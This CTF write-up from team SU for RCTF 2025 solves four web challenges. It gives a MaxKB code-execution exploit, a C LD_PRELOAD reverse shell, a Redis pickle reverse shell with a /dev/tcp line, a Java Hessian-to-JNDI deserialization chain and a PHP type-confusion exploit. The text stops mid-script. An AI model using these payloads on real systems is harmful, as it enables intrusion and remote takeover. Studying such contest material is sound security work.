本次 RCTF 我们 SU 取得了第五名的成绩,感谢队里师傅们的辛苦付出!同时我们也在持续招人,欢迎发送个人简介至:suers_xctf@126.com,或者直接联系 baozongwi(QQ:2405758945)。
以下是我们 SU 本次 2025 RCTF 的 WriteUp。
Web · RootKB:当时看见这题俺都惊了,为什么最新版本有 7~8 解,低版本却是 0 解?
在 PyCharm 里对比 v2.3.0 与 v2.3.1 的改动,发现新版本添加了 sandbox.so 和 LD_PRELOAD 环境变量,且 sandbox.so 允许被覆盖,那么参考 LD_PRELOAD 劫持的思路即可。
感觉开发者的修法好抽象,用sandbox.so修复了一个SSRF结果又来一个RCE,俺也不知道俺也不敢问
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 """ MaxKB RCE Exploit - Complete Attack Chain 增加:远程写文件功能 write_remote_file() """ import requestsimport jsonimport sysimport osimport base64import textwrapTARGET_URL = "http://web-rootkb-minusminus-54b389641de5.rctf.rois.team" USERNAME = "admin" PASSWORD = "MaxKB@123.." 
API_BASE = f"{TARGET_URL} /admin/api" TOOL_DEBUG_API = f"{API_BASE} /workspace/default/tool/debug" session = requests.session() session.headers.update({ 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' , 'Content-Type' : 'application/json' , 'Accept' : 'application/json' }) def login (): """Login to MaxKB and get JWT token""" login_data = { "username" : USERNAME, "password" : PASSWORD, "captcha" : "" } login_api = f"{API_BASE} /user/login" try : resp = session.post(login_api, json=login_data) if resp.status_code == 200 : result = resp.json() if 'data' in result and result['data' ] and 'token' in result['data' ]: token = result['data' ]['token' ] session.headers['AUTHORIZATION' ] = f'Bearer {token} ' print (f"[+] Login successful!" ) print (f"[+] JWT Token: {token[:50 ]} ..." ) return True else : print (f"[-] Login failed: {result} " ) return False else : print (f"[-] Login request failed: {resp.status_code} " ) return False except Exception as e: print (f"[-] Login error: {e} " ) return False def execute_python_code (code ): """Execute Python code through tool debug endpoint""" payload = { "code" : code, "input_field_list" : [], "init_field_list" : [], "init_params" : {}, "debug_field_list" : [] } try : resp = session.post(TOOL_DEBUG_API, json=payload) if resp.status_code == 200 : result = resp.json() print (result) return result.get('data' , 'No data returned' ) else : return f"HTTP {resp.status_code} : {resp.text} " except Exception as e: return f"Exception: {e} " def execute_system_command (cmd ): """Execute system command using Python equivalents""" if cmd == "id" : code = """def get_id(): import os return f"uid={os.getuid()}({os.environ.get('USER', 'unknown')}) gid={os.getgid()}" return get_id()""" elif cmd == "ls /" : code = """def ls_root(): import os items = os.listdir('/') items.sort() return "\\n".join(items) return ls_root()""" elif cmd.startswith("cat " ): filepath = cmd.split(" " , 1 )[1 ] code = f"""def read_file(): try: 
with open('{filepath} ', 'r') as f: return f.read() except Exception as e: return f"Error: {{str(e)}}" return read_file()""" else : code = f"""def run_cmd(): import os try: return str(os.listdir('{cmd} ')) except Exception as e: return f"Command execution failed: {{e}}" return run_cmd()""" return execute_python_code(code) def write_remote_file (remote_path, b64_content, mode="wb" ): """ 在目标机器上写二进制文件(从 base64 字符串解码) :param remote_path: 目标文件路径,例如 '/tmp/pwned.bin' :param b64_content: base64 编码后的内容(str) :param mode: 文件模式,默认 'wb',可以传 'ab' 追加二进制 """ code = f"""def write_file(): import base64 path = {remote_path!r} b64_data = {b64_content!r} mode = {mode!r} try: data = base64.b64decode(b64_data) with open(path, mode) as f: f.write(data) return f"OK: wrote {{len(data)}} bytes to {{path}} with mode={{mode}}" except Exception as e: return f"Error writing to {{path}}: {{e}}" return write_file()""" return execute_python_code(code) def execute_redis_command (host, port, password, command ): """ 在目标机器上执行 Redis 命令 :param host: Redis 服务器地址 :param port: Redis 服务器端口 :param password: Redis 密码,如果没有则为 None :param command: 要执行的 Redis 命令,以字符串形式提供,例如 "KEYS *" 或 "GET mykey" :return: 命令执行结果或错误信息 """ code = f"""def redis_cmd_runner(): try: import redis import json except ImportError: return "Error: 'redis' library not found on the target system." 
# 将外部传入的参数赋值给内部变量 redis_host = {host!r} redis_port = {port} redis_password = {password!r} # 如果 password 为 None,!r 会正确处理成 'None' command_str = {command!r} try: # 建立 Redis 连接 # decode_responses=False 是默认行为,我们会手动解码,以更好地处理潜在的编码错误 r = redis.Redis(host=redis_host, port=redis_port, password=redis_password, db=0) # 测试连接 r.ping() # 将命令字符串拆分成列表,以便传递给 execute_command command_parts = command_str.split() # 执行命令 raw_result = r.execute_command(*command_parts) # Redis 的返回结果通常是 bytes 或 list of bytes,需要解码 def decode_redis_result(item): if isinstance(item, bytes): return item.decode('utf-8', 'ignore') # 使用 ignore 以免遇到非 utf8 字符时崩溃 elif isinstance(item, list): return [decode_redis_result(i) for i in item] else: return item # 对于数字等类型,直接返回 result = decode_redis_result(raw_result) # 以 JSON 格式返回,统一输出 return json.dumps(result, indent=2, ensure_ascii=False) except Exception as e: return f"Redis Error: {{e}}" return redis_cmd_runner()""" return execute_python_code(code) def get_environment_variables (): """ 在目标机器上获取并返回所有环境变量 """ code = f"""def dump_env_vars(): import os try: env_data = str(os.environ) path = "/opt/maxkb-app/sandbox/env.txt" with open(path, 'w', encoding='utf-8') as f: f.write(env_data) return env_data except Exception as e: return f"Error getting environment variables: {{e}}" return dump_env_vars()""" return execute_python_code(code) def main (): """Main exploitation function""" print ("=" * 60 ) print ("MaxKB RCE Exploit - Complete Attack Chain" ) print ("=" * 60 ) print (f"[+] Target: {TARGET_URL} " ) print (f"[+] Username: {USERNAME} " ) print (f"[+] Exploit endpoint: {TOOL_DEBUG_API} " ) print ("\n[+] Step 1: Authentication" ) if not login(): print ("[-] Exploit failed - cannot login" ) return print ("\n[+] Step 2: Remote Code Execution" ) print ("\n[*] Testing code execution:" ) code = """def test(): return "RCE confirmed - Code execution successful!" 
return test()""" result = execute_python_code(code) print (f"[Result] {result} " ) print ("\n[+] Step 3: System Command Execution" ) commands = ["""/opt/maxkb-app/sandbox/""" , "echo 123" ] for cmd in commands: print (f"\n[*] Executing: {cmd} " ) result = execute_system_command(cmd) print (f"[Output]\n{result} " ) print ("\n[+] Step 3.5: Remote File Write Test" ) test_path = "/opt/maxkb-app/sandbox/sandbox.so" with open ("revshell.so" , "rb" ) as f: raw = f.read() b64_str = base64.b64encode(raw).decode("ascii" ) result = write_remote_file(test_path, b64_str) print (f"[Write Result] {result} " ) print ("\n[*] Read back the written file:" ) read_back = execute_system_command(f"cat {test_path} " ) print (f"[File Content]\n{read_back} " ) print ("\n[+] Step 5: PostgreSQL Database Interaction" ) db_conn_str = "dbname='maxkb' user='root' host='127.0.0.1' password='Password123@postgres'" print (f"[*] Using DB connection string (example): {db_conn_str} " ) print ("\n[*] Query 1: Listing all databases..." ) list_db_query = "SELECT datname FROM pg_database WHERE datistemplate = false;" result = query_postgresql(db_conn_str, list_db_query) print (f"[Result]\n{result} " ) print ("\n[+] Step 6: Redis Service Interaction" ) redis_host = "127.0.0.1" redis_port = 6379 redis_password = "Password123@redis" redis_commands = [ "INFO" , "KEYS *" , "GET flag" , "HGETALL user:1" , "set " ] for cmd in redis_commands: print (f"\n[*] Executing Redis command: '{cmd} '" ) result = execute_redis_command(redis_host, redis_port, redis_password, cmd) print (f"[Result]\n{result} " ) if exploit_result and "Success" in exploit_result: print (f"[+] {exploit_result} " ) print ("[!] On a vulnerable version, this could lead to RCE!" ) else : print (f"[-] {exploit_result} " ) print ("\n" + "=" * 60 ) print ("[+] EXPLOIT FINISHED" ) print ("=" * 60 ) if __name__ == "__main__" : main()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> void _revshell_init(void ) __attribute__((constructor));void _revshell_init(void ) { const char *ip = "xxxx" ; const int port = 9999 ; int sockfd; struct sockaddr_in addr ; sockfd = socket(AF_INET, SOCK_STREAM, 0 ); if (sockfd < 0 ) { return ; } addr.sin_family = AF_INET; addr.sin_port = htons(port); if (inet_pton(AF_INET, ip, &addr.sin_addr) <= 0 ) { close(sockfd); return ; } if (connect(sockfd, (struct sockaddr *)&addr, sizeof (addr)) < 0 ) { close(sockfd); return ; } dup2(sockfd, 0 ); dup2(sockfd, 1 ); dup2(sockfd, 2 ); execve("/bin/sh" , NULL , NULL ); close(sockfd); }
在 VPS 上接收 shell,获得 FLAG。
RootKB--:Python 沙箱绕过俺不会,但是打 Redis 触发 pickle 反序列化这个俺会,话不多说直接丢脚本。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 """ MaxKB RCE Exploit - Complete Attack Chain 增加:远程写文件功能 write_remote_file() 增加:Redis Pickle 注入功能 inject_pickle_payload() 修正:修复了所有 'return' outside function 的语法错误 """ import requestsimport jsonimport sysimport osimport base64import textwrapimport pickleimport subprocessTARGET_URL = "http://xxx:8030/" USERNAME = "admin" PASSWORD = "MaxKB@123.." API_BASE = f"{TARGET_URL} /admin/api" TOOL_DEBUG_API = f"{API_BASE} /workspace/default/tool/debug" session = requests.session() session.headers.update({ 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' , 'Content-Type' : 'application/json' , 'Accept' : 'application/json' }) def login (): """ Login to MaxKB and get JWT token. Returns the token string on success, None on failure. 
""" login_data = { "username" : USERNAME, "password" : PASSWORD, "captcha" : "" } login_api = f"{API_BASE} /user/login" try : resp = session.post(login_api, json=login_data) if resp.status_code == 200 : result = resp.json() if 'data' in result and result['data' ] and 'token' in result['data' ]: token = result['data' ]['token' ] session.headers['AUTHORIZATION' ] = f'Bearer {token} ' print (f"[+] Login successful!" ) print (f"[+] JWT Token: {token[:50 ]} ..." ) return token else : print (f"[-] Login failed: {result} " ) return None else : print (f"[-] Login request failed: {resp.status_code} " ) return None except Exception as e: print (f"[-] Login error: {e} " ) return None def execute_python_code (code ): """Execute Python code through tool debug endpoint""" payload = { "code" : code, "input_field_list" : [], "init_field_list" : [], "init_params" : {}, "debug_field_list" : [] } try : resp = session.post(TOOL_DEBUG_API, json=payload) if resp.status_code == 200 : result = resp.json() if result.get('code' ) != 200 : print (f"[-] Server-side error: {result.get('message' )} " ) return result.get('data' , 'No data returned' ) else : return f"HTTP {resp.status_code} : {resp.text} " except Exception as e: return f"Exception: {e} " class PickleRCE : def __init__ (self, command ): self .command = command def __reduce__ (self ): return (subprocess.call, (["python3" ,"-c" ,'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxxx",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ],)) def inject_pickle_payload (redis_host, redis_port, redis_password, token, command ): """ Generates a pickle payload and injects it into Redis via the RCE vulnerability. 
""" print (f"[*] Crafting pickle payload to execute command: '{command} '" ) pickle_payload = pickle.dumps(PickleRCE(command)) b64_payload = base64.b64encode(pickle_payload).decode('ascii' ) redis_key = f":TOKEN:{token} " print (f"[*] Target Redis key will be: {redis_key} " ) remote_code = f""" def set_pickle_in_redis(): import redis import base64 try: r = redis.Redis(host={redis_host!r} , port={redis_port} , password={redis_password!r} , db=0) redis_key = {redis_key!r} b64_payload = {b64_payload!r} pickle_data = base64.b64decode(b64_payload) r.set(redis_key, pickle_data) return f"OK: Successfully wrote {{len(pickle_data)}} bytes of pickle data to key '{{redis_key}}'." except Exception as e: return f"Redis Error: {{e}}" set_pickle_in_redis() # <-- FIX: Removed 'return' from here """ print ("[*] Sending payload to remote server to inject into Redis..." ) return execute_python_code(remote_code) def execute_system_command (cmd ): """Execute system command using a robust method.""" code = f""" def run_cmd(): import subprocess import shlex command = {cmd!r} try: # Use shlex.split for better argument handling args = shlex.split(command) result = subprocess.run(args, capture_output=True, text=True, timeout=10) output = result.stdout if result.stdout else "" error = result.stderr if result.stderr else "" if output or error: return f"STDOUT:\\n{{output}}\\nSTDERR:\\n{{error}}" else: return "Command executed with no output." except FileNotFoundError: return f"Error: Command not found or path does not exist." 
except Exception as e: return f"Command execution failed: {{e}}" run_cmd() # <-- FIX: Removed 'return' from here """ return execute_python_code(code) def main (): """Main exploitation function""" print ("=" * 60 ) print ("MaxKB RCE Exploit - Complete Attack Chain" ) print ("=" * 60 ) print (f"[+] Target: {TARGET_URL} " ) print ("\n[+] Step 1: Authentication" ) token = login() if not token: print ("[-] Exploit failed - cannot login" ) return print ("\n[*] Testing basic code execution..." ) test_code = """ def test(): return "RCE confirmed - Code execution successful!" test() """ result = execute_python_code(test_code) print (f"[Result] {result} " ) if "RCE confirmed" not in str (result): print ("[-] Basic RCE test failed. Aborting." ) return print ("\n[+] Step 2: Injecting Pickle Payload into Redis for RCE" ) redis_host = "127.0.0.1" redis_port = 6379 redis_password = "Password123@redis" command_to_execute = "bash -c 'bash -i >& /dev/tcp/YOUR_ATTACKER_IP/YOUR_PORT 0>&1'" result = inject_pickle_payload(redis_host, redis_port, redis_password, token, command_to_execute) print (f"[Injection Result] {result} " ) if "OK:" in str (result): print ("\n[+] Pickle payload injected successfully!" ) print ("[*] The next time the application deserializes this token from Redis," ) print (f"[*] the command '{command_to_execute} ' should be executed on the server." ) print ("[*] You may need to trigger this by making another authenticated request or simply waiting." ) print ("[*] If using a reverse shell, make sure your listener (e.g., 'nc -lvnp YOUR_PORT') is running." ) else : print ("\n[-] Failed to inject pickle payload." ) print ("\n[+] You can now try to verify if the command was executed (if you used a non-interactive command)." 
) print ("[*] For example, checking if the file '/tmp/pwned_by_pickle' exists:" ) verification_result = execute_system_command("ls -l /tmp/pwned_by_pickle" ) print (f"[Verification Result]\n{verification_result} " ) print ("\n" + "=" * 60 ) print ("[+] EXPLOIT FINISHED" ) print ("=" * 60 ) if __name__ == "__main__" : main()
maybe_easy 经典JAVA 反序列化题目,复习一下SU18 巨佬文章
// Registers the package prefixes that make up the challenge's whitelist.
// NOTE(review): how WHITE_PACKAGES is consulted is not shown in this excerpt;
// presumably class names are prefix-matched against these entries — confirm.
static {
    WHITE_PACKAGES.add("com.rctf.server.tool.");
    WHITE_PACKAGES.add("java.util.");
    WHITE_PACKAGES.add("org.apache.commons.logging.");
    WHITE_PACKAGES.add("org.springframework.beans.");
    WHITE_PACKAGES.add("org.springframework.jndi.");
}
观察发现白名单跟Spring AOP 和 Spring Context & AOP 两条链子关系很大,最后极有可能打的是JNDI
题目给了一个存在 compareTo 方法的类(Maybe),那么 kick-off 入口类也就确定是 TreeMap 了:TreeMap 在比较键时会触发键的 compareTo。
package com.rctf.server.tool;

import java.io.Serializable;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;

/**
 * A serializable {@link Proxy} subclass that is also {@link Comparable}.
 *
 * <p>Every {@code compareTo} call is forwarded to the wrapped
 * {@link InvocationHandler}, so whoever supplies the handler decides what a
 * comparison actually does.
 */
public class Maybe extends Proxy implements Comparable<Object>, Serializable {

    /**
     * @param h the invocation handler stored by {@link Proxy} and later used by
     *          {@link #compareTo(Object)}
     */
    public Maybe(InvocationHandler h) {
        super(h);
    }

    /**
     * Delegates the comparison to the handler.
     *
     * @param o the object to compare against; passed to the handler as the
     *          single call argument
     * @return the handler's result cast to {@code Integer} and unboxed
     * @throws RuntimeException wrapping any {@code Throwable} raised while
     *         looking up the method, invoking the handler, or casting its result
     */
    public int compareTo(Object o) {
        try {
            // The handler is handed Comparable.compareTo(Object) as the "invoked" method.
            Method method = Comparable.class.getMethod("compareTo", Object.class);
            Object result = this.h.invoke(this, method, new Object[]{o});
            return (Integer) result;
        } catch (Throwable e) {
            throw new RuntimeException(e);
        }
    }
}
在 IDEA 里面扒一扒实现了 InvocationHandler 接口且在白名单内的类有哪些,只有这三个:
EarlySingletonInvocationHandler 类看着没啥用
ServiceLocatorInvocationHandler 类最后会触发args[0]的toString 方法,利用难度太大
参考 Spring1 链子易知,ObjectFactoryDelegatingInvocationHandler 可以对自定义的 ObjectFactory 触发 getObject 方法
翻了一下找到了 TargetBeanObjectFactory 这个类,恰巧 SimpleJndiBeanFactory 这个类实现了 BeanFactory 接口,其中的 getBean 方法会触发 lookup,一切就大功告成了
PoC如下,用java-chains 打 JNDI 二次反序列化注入内存马即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 package org.example;import com.caucho.hessian.io.Hessian2Input;import com.caucho.hessian.io.Hessian2Output;import com.caucho.hessian.io.SerializerFactory;import org.apache.commons.logging.impl.NoOpLog;import org.example.tool.HessianFactory;import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor;import org.springframework.aop.target.HotSwappableTargetSource;import org.springframework.jndi.support.SimpleJndiBeanFactory;import org.springframework.scheduling.annotation.AsyncAnnotationAdvisor;import com.rctf.server.tool.Maybe;import org.springframework.beans.factory.BeanFactory;import org.springframework.beans.factory.ObjectFactory;import org.springframework.jndi.support.SimpleJndiBeanFactory;import java.io.FileInputStream;import java.io.FileOutputStream;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationHandler;import java.lang.reflect.Proxy;import java.util.*;public class PoC1 { public static void main (String[] args) throws Exception { String url = "ldap://xxxx:50389/4e13d5" ; SimpleJndiBeanFactory beanFactory = new SimpleJndiBeanFactory (); beanFactory.setShareableResources(url); Class<?> tboFactoryClass = Class.forName("org.springframework.beans.factory.config.ObjectFactoryCreatingFactoryBean$TargetBeanObjectFactory" ); Constructor<?> tboFactoryConstructor = tboFactoryClass.getDeclaredConstructor(BeanFactory.class, String.class); tboFactoryConstructor.setAccessible(true ); ObjectFactory<?> objectFactory = (ObjectFactory<?>) tboFactoryConstructor.newInstance(beanFactory, url); Class<?> ofdihClass = Class.forName("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler" ); Constructor<?> 
ofdihConstructor = ofdihClass.getDeclaredConstructor(ObjectFactory.class); ofdihConstructor.setAccessible(true ); InvocationHandler handler = (InvocationHandler) ofdihConstructor.newInstance(objectFactory); Maybe maybeProxy = new Maybe (handler); TreeMap<Object,Object> m = new TreeMap <>(); setFieldValue(m, "size" , 2 ); setFieldValue(m, "modCount" , 2 ); Class<?> nodeC = Class.forName("java.util.TreeMap$Entry" ); Constructor nodeCons = nodeC.getDeclaredConstructor(Object.class, Object.class, nodeC); nodeCons.setAccessible(true ); Object node = nodeCons.newInstance("RoboTerh" , new Object [0 ], null ); Object right = nodeCons.newInstance(maybeProxy, new Object [0 ], node); setFieldValue(node, "right" , right); setFieldValue(m, "root" , node); String payload_base64 = HessianFactory.serialize((Object) m); System.out.println("payload_base64: " + payload_base64); } public static void setFiled (String classname, Object o, String fieldname, Object value) throws Exception { Class<?> aClass = Class.forName(classname); Field field = aClass.getDeclaredField(fieldname); field.setAccessible(true ); field.set(o, value); } public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception { final Field field = getField(obj.getClass(), fieldName); field.set(obj, value); } public static Field getField (final Class<?> clazz, final String fieldName ) throws Exception { try { Field field = clazz.getDeclaredField(fieldName); if ( field != null ) field.setAccessible(true ); else if ( clazz.getSuperclass() != null ) field = getField(clazz.getSuperclass(), fieldName); return field; } catch ( NoSuchFieldException e ) { if ( !clazz.getSuperclass().equals(Object.class) ) { return getField(clazz.getSuperclass(), fieldName); } throw e; } } }
感谢出题师傅手下留情,俺做出来了。学了这么久的 JAVA,要是这次再爆 0,俺真的会玉玉了
photographer 入口在 public/index.php,其中完成了框架加载、鉴权初始化以及路由分发。请求经过 Apache 的 .htaccess 重写进入该入口,随后由路由器将 URL 映射到控制器方法。入口代码如下:
// Front controller: load the autoloader, initialise auth state, then dispatch the request.
require_once __DIR__ . '/../app/config/autoload.php';

// Runs before routing, so the auth state is set up before any controller executes.
Auth::init();

$router = new Router();
// router.php returns a callable that is invoked with the router instance
// (presumably to register the routes — the file itself is not shown here).
$routeLoader = require __DIR__ . '/../app/config/router.php';
$routeLoader($router);
$router->dispatch();
鉴权初始化的关键在 Auth::init(),它从会话中读取当前用户 ID 并去数据库查询用户对象。注意到,这个查询把用户表 user 与图片表 photo 做了连接,并且使用了 SELECT *
/**
 * Session-backed holder for the current user (excerpt; other methods are not shown).
 */
class Auth {
    // Result of User::findById() for the session's user_id; stays null when
    // the session carries no user_id.
    private static $user = null;

    /**
     * Start the named session if none is active, then load the user
     * referenced by $_SESSION['user_id'], if any.
     */
    public static function init() {
        if (session_status() === PHP_SESSION_NONE) {
            session_name(config('session.name'));
            session_start();
        }
        if (isset($_SESSION['user_id'])) {
            self::$user = User::findById($_SESSION['user_id']);
        }
    }

    /**
     * Return the 'type' entry of the loaded user row.
     *
     * The value is taken verbatim from whatever User::findById() returned;
     * there is no null check and no check of which table the column came from.
     */
    public static function type() {
        return self::$user['type'];
    }
}
superadmin.php 把当前用户的类型值与 admin 的值(为 0)做严格“小于”比较。也就是说,只有类型值小于 0 的用户才会被视为“超管”。这段代码如下:
Auth::init();
$user_types = config('user_types');

// The flag is printed only when Auth::check() passes (not shown here;
// presumably "is logged in") AND the user's type compares strictly less than
// the configured admin value. Any other request is redirected to "/".
if (Auth::check() && Auth::type() < $user_types['admin']) {
    // Falls back to a placeholder flag when the FLAG environment variable is unset or empty.
    echo getenv('FLAG') ?: 'RCTF{test_flag}';
} else {
    header('Location: /');
}
再看角色值的配置,明确把 admin 定义为 0,auditor 为 1,user 为 2。
// Role name => numeric type value; 'admin' is the smallest value defined here.
'user_types' => [
    'admin' => 0,
    'auditor' => 1,
    'user' => 2
],
如果仅有这两处,攻击者还无法改变自己的类型为负数。但是获取查询是有问题的。User::findById 将用户表与图片表通过 LEFT JOIN 连接,并且使用 SELECT *,这会把两张表的所有列合并成一个关联数组。
如果存在同名列,右表会覆盖左表。user 表有 type(用户角色),photo 表也有 type(图片 MIME 类型)。所以只要设置了背景图(user.background_photo_id 指向某张 photo 记录)之后,查询结果中的 type 字段就来自 photo.type 而不是 user.type。代码如下:
/**
 * Fetch the first row for the given user id, LEFT JOINed with the photo table
 * on user.background_photo_id = photo.id.
 *
 * No column list is specified in this query.
 * NOTE(review): the result therefore presumably contains the columns of both
 * tables, with same-named columns (e.g. `type`) colliding — confirm against
 * the DB wrapper's fetch mode.
 *
 * @param mixed $userId value compared against user.id
 * @return mixed whatever the query builder's first() returns
 */
public static function findById($userId)
{
    return DB::table('user')
        ->leftJoin('photo', 'user.background_photo_id', '=', 'photo.id')
        ->where('user.id', '=', $userId)
        ->first();
}
Auth::type() 实际上读取的是图片的 type 字段。只要我们能让某张图片的 type 变成一个“可被 PHP 比较为更小于 0 的值”,就能在 superadmin.php 中通过“超管”判断。
图片的 type 是从上传接口写入的,这个接口直接把 $_FILES['type'] 原样存进数据库,而 $_FILES['type'] 由请求中的 multipart/form-data 文件分段头的 Content-Type 决定,完全可由客户端控制:
1 2 3 4 5 6 7 8 9 $result = Photo ::create ([ 'user_id' => Auth ::id (), 'original_filename' => $file ['name' ], 'saved_filename' => $savedFilename , 'type' => $file ['type' ], 'size' => $file ['size' ], ... ]);
图片校验函数 isValidImage 并不校验或规范化客户端提交的 Content-Type,它仅验证扩展名、大小以及 getimagesize 是否能读出基本信息。因此我们既可以上传一张合法的 PNG/JPG 文件来满足这些检查,又可以在分段头将 Content-Type 写成任意字符串(例如 -1)。
/**
 * Decide whether an uploaded file entry is accepted as an image.
 *
 * Three checks are made: the lower-cased filename extension must be in the
 * configured allow-list, the reported size must not exceed the configured
 * maximum, and getimagesize() must succeed on the temporary file.
 * $file['type'] (the MIME type sent by the client) is never inspected here.
 *
 * @param array $file upload entry; reads 'name', 'size' and 'tmp_name'
 * @return bool true when all three checks pass, false otherwise
 */
function isValidImage($file)
{
    $allowedExtensions = config('upload.allowed_extensions');
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExtensions)) return false;
    if ($file['size'] > config('upload.max_size')) return false;
    // '@' suppresses the warning getimagesize() emits on unreadable input.
    $imageInfo = @getimagesize($file['tmp_name']);
    if ($imageInfo === false) return false;
    return true;
}
所以思路清晰了,首先在 /register 完成正常注册登录,随后构造原始 multipart/form-data 请求体,将文件分段头设为 Content-Type: -1 上传一张满足扩展名和 getimagesize 的合法图片,得到这张图片的 photo_id。然后调用 /api/user/background 将其设为当前用户的背景图。此时再访问 superadmin.php,由于 Auth::type() 读取的是 photo.type 且它是 -1,满足 < admin(0),服务器就会返回 FLAG。
1 2 3 4 5 6 7 8 9 POST /api/photos/upload HTTP/1.1 Content-Type : multipart/form-data; boundary=----XContent-Disposition: form-data; name="photos[]" ; filename="x.png" Content-Type : -1 PNG_BYTES...
exp 如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 import reimport jsonimport timeimport osimport sysimport subprocessimport tempfileimport urllib.parseimport randomimport stringIMG_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), "public/assets/img/default-avatar.png" )) BASES_DEFAULT = [ "http://1.95.160.41:26000" , "http://1.95.160.41:26001" , "http://1.95.160.41:26002" , ] TIMEOUT = 20 def run (cmd ): return subprocess.run(cmd, shell=True , capture_output=True , text=True ).stdout def get_csrf_from_html (html ): m = re.search(r'name="csrf_token"\s+value="([^"]+)"' , html) return m.group(1 ) if m else None def curl_get (url, cookie=None ): copt = f"-b {cookie} " if cookie else "" return run(f"curl -s {copt} {url} " ) def curl_post_form (url, data, cookie ): payload = urllib.parse.urlencode(data) return run(f"curl -s -c {cookie} -b {cookie} -X POST {url} -d \"{payload} \"" ) def build_multipart_body (img_bytes, field_name="photos[]" , filename="x.png" , forced_ct="-1" ): boundary = "----TraeBoundary" + "" .join(random.choice(string.ascii_letters + string.digits) for _ in range (16 )) head = ( f"--{boundary} \r\n" f'Content-Disposition: form-data; name="{field_name} "; filename="{filename} "\r\n' f"Content-Type: {forced_ct} \r\n\r\n" ).encode() tail = f"\r\n--{boundary} --\r\n" .encode() body = head + img_bytes + tail return boundary, body def curl_post_multipart (url, boundary, body_path, cookie ): return run(f"curl -s -b {cookie} -H 'Content-Type: multipart/form-data; boundary={boundary} ' --data-binary @{body_path} {url} " ) def exploit_base (base ): port = base.split(":" )[-1 ] cookie = f"/tmp/photographer_{port} .cookie" reg_html = run(f"curl -s -c {cookie} {base} /register" ) csrf = 
